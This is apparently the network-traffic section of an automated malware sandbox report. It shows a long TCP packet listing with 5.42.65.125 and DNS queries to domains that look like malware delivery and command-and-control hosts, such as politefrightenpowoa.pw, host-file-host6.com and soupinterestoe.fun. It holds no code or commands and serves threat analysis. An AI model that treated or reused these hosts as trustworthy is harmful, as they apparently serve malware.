Dec 27, 2023 17:57:26.485248089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485254049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.485259056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485266924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485280037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.485301971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.485311985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485321045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485327005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485333920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485356092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.485364914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485375881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.485375881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485388994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485395908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485404968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485428095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.485455990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.485493898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485941887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485951900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485965967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485975027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485987902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485996962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485997915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486006021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486016035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486022949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486023903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486033916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486042023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486042023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486056089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486082077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486128092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486138105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486151934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486160040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486170053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486177921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486186028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486186028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486196995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486206055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486212015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486221075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486248016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486277103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486582041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486592054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486603975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486640930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486648083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486658096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486671925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486694098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486702919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486704111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486712933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486735106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486751080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486758947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486763000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486779928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486787081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486794949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486804008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486812115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486843109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486866951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486876965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486906052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486921072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.486949921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486958981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486985922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.486994982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487001896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.487029076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487035036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.487039089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487055063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487082005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.487106085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487116098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487117052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.487155914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.487271070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487283945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487330914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.487512112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487521887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487550974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487561941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.487586975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487611055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487620115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487664938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.487766981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487776995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487785101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487792969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487798929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487807035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487813950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487823009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487835884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487844944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487858057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487865925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487884045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487884998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.487905979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.487915993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487926006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.487976074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.488295078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488323927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488332987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488346100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488353014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.488357067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488368988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488377094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488379955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.488408089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488411903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.488418102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488431931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488436937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.488465071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.488478899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488488913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488509893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488528967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.488553047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.488611937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488622904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488635063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488641977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488666058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.488678932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488692045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488693953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.488701105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488708019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488715887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488734007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488734961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.488754988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488763094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488763094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.488794088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.488794088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488811016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.488867998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488878012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488893032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.488922119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.488951921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.489146948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489228010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489275932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489284992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489296913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489303112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.489306927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489337921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.489348888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.489377022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489392996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489406109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489413977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489422083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489438057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489439964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.489445925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489454985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489464998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489470005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.489475012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489485025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489489079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.489491940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489509106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.489526033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489531040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.489536047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489548922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489587069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.489778996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489847898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489856958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489902973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.489928961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489938974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489952087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489960909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489974022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.489979029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.489983082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490006924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.490024090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490032911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490034103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.490041971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490052938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490067959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490070105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.490101099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.490133047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490142107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490149975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490156889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490165949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490176916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.490181923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490192890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490211964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.490211964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490231991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.490257978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490267992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490305901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.490330935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490339994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490355015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490364075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490372896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.490386009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.490416050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.491281033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491331100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491339922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491353035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491362095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491385937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.491411924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.491411924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491463900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491472960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491488934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491497993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491518974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.491542101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.491559982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491570950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491584063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491592884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491600990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491615057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491616964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.491626978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491631031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.491638899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491647005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491653919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491661072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.491669893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.491705894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.492300034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492311001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492325068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492336035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492369890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.492382050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492391109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.492391109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492422104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492430925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492438078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.492463112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492470026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.492471933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492486000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492496014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492517948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.492543936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.492619038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492628098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492644072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492651939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492659092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492676020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492676973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.492683887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492697954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492705107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.492706060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492716074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492731094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.492734909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492743015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492762089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.492784023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.492801905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492810965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492824078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492831945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492841005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.492867947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.492889881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.495436907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.495446920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.495470047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.495497942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.495529890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.495542049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.495549917 CET	80	49738	5.42.65.125	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2023 17:57:18.674906969 CET	192.168.2.4	1.1.1.1	0x764	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:19.672409058 CET	192.168.2.4	1.1.1.1	0x8e83	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:37.092577934 CET	192.168.2.4	1.1.1.1	0x7926	Standard query (0)	politefrightenpowoa.pw	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:37.271085978 CET	192.168.2.4	1.1.1.1	0x3b54	Standard query (0)	opposesicknessopw.pw	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:37.481441975 CET	192.168.2.4	1.1.1.1	0x205	Standard query (0)	chincenterblandwka.pw	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:37.661305904 CET	192.168.2.4	1.1.1.1	0xba18	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:49.194513083 CET	192.168.2.4	1.1.1.1	0x7f9	Standard query (0)	soupinterestoe.fun	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:58:00.354259968 CET	192.168.2.4	1.1.1.1	0x2f31	Standard query (0)	politefrightenpowoa.pw	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:58:00.682492971 CET	192.168.2.4	1.1.1.1	0x528e	Standard query (0)	opposesicknessopw.pw	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:58:04.959820986 CET	192.168.2.4	1.1.1.1	0x833e	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:58:05.130064964 CET	192.168.2.4	1.1.1.1	0xdff5	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:58:21.325841904 CET	192.168.2.4	1.1.1.1	0xbe47	Standard query (0)	31.241.2.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Dec 27, 2023 17:58:43.962908983 CET	192.168.2.4	1.1.1.1	0xad3a	Standard query (0)	oshi.at	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:59:13.078463078 CET	192.168.2.4	1.1.1.1	0xe5	Standard query (0)	31.241.2.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Dec 27, 2023 17:59:25.203650951 CET	192.168.2.4	1.1.1.1	0x6651	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
